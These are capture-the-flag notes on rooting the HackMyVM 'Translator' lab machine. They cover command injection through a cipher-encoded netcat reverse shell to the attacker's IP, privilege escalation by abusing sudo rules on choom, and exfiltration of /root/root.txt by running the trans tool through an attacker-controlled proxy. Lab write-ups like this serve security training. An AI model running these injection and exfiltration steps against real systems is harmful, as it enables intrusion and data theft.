NOTES ABOUT Translator
[ 2022-10-22 ] [ HackMyVM / Translator ]Status: Rooted
Skills: Port Scanning, Command Injection, Sudo
Tools: nmap, ssh, gobuster, curl, nc, trans, choom
PORT SCANNING
$ nmap -T4 -sCSV -p- 10.0.2.35
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 08:cf:50:b2:4f:41:43:c4:66:56:ce:96:b9:04:8c:77 (RSA)
| 256 40:b7:11:24:76:59:cd:e0:79:db:71:d1:39:29:d5:45 (ECDSA)
|_ 256 44:64:ba:b8:52:4f:ca:00:dd:3e:c3:28:71:6f:77:76 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Site doesn\'t have a title (text/html).
|_http-server-header: nginx/1.18.0
GETTING IN
$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u 10.0.2.35
/index.html (Status: 200) [Size: 290]
/translate.php (Status: 200) [Size: 20]
$ curl "http://10.0.2.35/translate.php?hmv=id"
Translated to:<br>rw
rw
$ curl "http://10.0.2.35/translate.php?hmv=id;rw"
Translated to:<br>rw;id
rw
uid=33(www-data) gid=33(www-data) groufs=33(www-data)
$ curl "http://10.0.2.35/translate.php?hmv=nc%20-c%20/bin/bash%2010.0.2.15%2080"
Translated to:<br>mx -v /yrm/yzhs 10.0.2.15 80
mx -c /yrm/yzts 10.0.2.15 80
curl "http://10.0.2.35/translate.php?hmv=a;mx%20-x%20/yrm/yzhs%2010.0.2.15%2080"
$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.35] 40590
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ELEVATING PRIVILEGES
WWW-DATA TO OCEAN
ls -la
total 24
drwxr-xr-x 2 www-data www-data 4096 Oct 23 01:42 .
drwxr-xr-x 3 root root 4096 May 11 10:25 ..
-rw-r--r-- 1 www-data www-data 24 May 11 10:29 hvxivg
-rw-r--r-- 1 www-data www-data 290 May 11 10:29 index.html
-rw-r--r-- 1 www-data www-data 10 Oct 23 01:42 tr
-rw-r--r-- 1 www-data www-data 258 May 11 10:29 translate.php
cat translate.php
<?php
$test = $_GET['hmv'];
$test = escapeshellcmd($test);
echo ("Translated to:");
echo "<br>";
$ultima_linea = system('echo '.$test.'| tr abcdefghijklmnopqrstuvwxyz zyxwvutsrqponmlkjihgfedcba');
$ulti = system('echo '.$ultima_linea.'| tr "php" "wtf"');
?>
cat hvxivg | tr abcdefghijklmnopqrstuvwxyz zyxwvutsrqponmlkjihgfedcba
My password is *******
ls -laR /home
/home:
total 16
drwxr-xr-x 4 root root 4096 May 11 10:28 .
drwxr-xr-x 18 root root 4096 May 11 10:20 ..
drwxr-xr-x 2 india india 4096 May 11 10:32 india
drwxr-xr-x 3 ocean ocean 4096 May 11 10:31 ocean
[...]
OCEAN TO INDIA
ssh ocean@10.0.2.35
ocean@10.0.2.35\'s password: ******
ocean@translator:~$
ocean@translator:~$ cat user.txt
****************
ocean@translator:~$ sudo -l
Matching Defaults entries for ocean on translator:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ocean may run the following commands on translator:
(india) NOPASSWD: /usr/bin/choom
ocean@translator:~$ sudo -u india choom -n 0 /bin/bash
india@translator:/home/ocean
INDIA TO ROOT
india@translator:~$ sudo -l
Matching Defaults entries for india on translator:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User india may run the following commands on translator:
(root) NOPASSWD: /usr/local/bin/trans
india@translator:~$ trans -h
Usage: trans [OPTIONS] [SOURCES]:[TARGETS] [TEXT]...
[...]
Networking options:
-x HOST:PORT, -proxy HOST:PORT
Use HTTP proxy on given port.
-u STRING, -user-agent STRING
Specify the User-Agent to identify as.
-4, -ipv4, -inet4-only
Connect only to IPv4 addresses.
-6, -ipv6, -inet6-only
Connect only to IPv6 addresses.
[...]
I/O options:
-i FILENAME, -input FILENAME
Specify the input file.
-o FILENAME, -output FILENAME
Specify the output file.
[...]
nc -lvnp 80 > proxy-translator
india@translator:~$ sudo /usr/local/bin/trans -i /root/root.txt -x 10.0.2.15:80
[ERROR] Null response.
[ERROR] Oops! Something went wrong and I can't translate it for you :(
ROOT FLAG IS q PARAM URL DECODED
cat proxy-translator
GET http://translate.googleapis.com/translate_a/single?client=gtx&ie=UTF-8&oe=UTF-8&dt=bd&dt=ex&dt=ld&dt=md&dt=rw&dt=rm&dt=ss&dt=t&dt=at&dt=gt&dt=qca&sl=auto&tl=es&hl=es&q=***************************** HTTP/1.1
Host: translate.googleapis.com
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36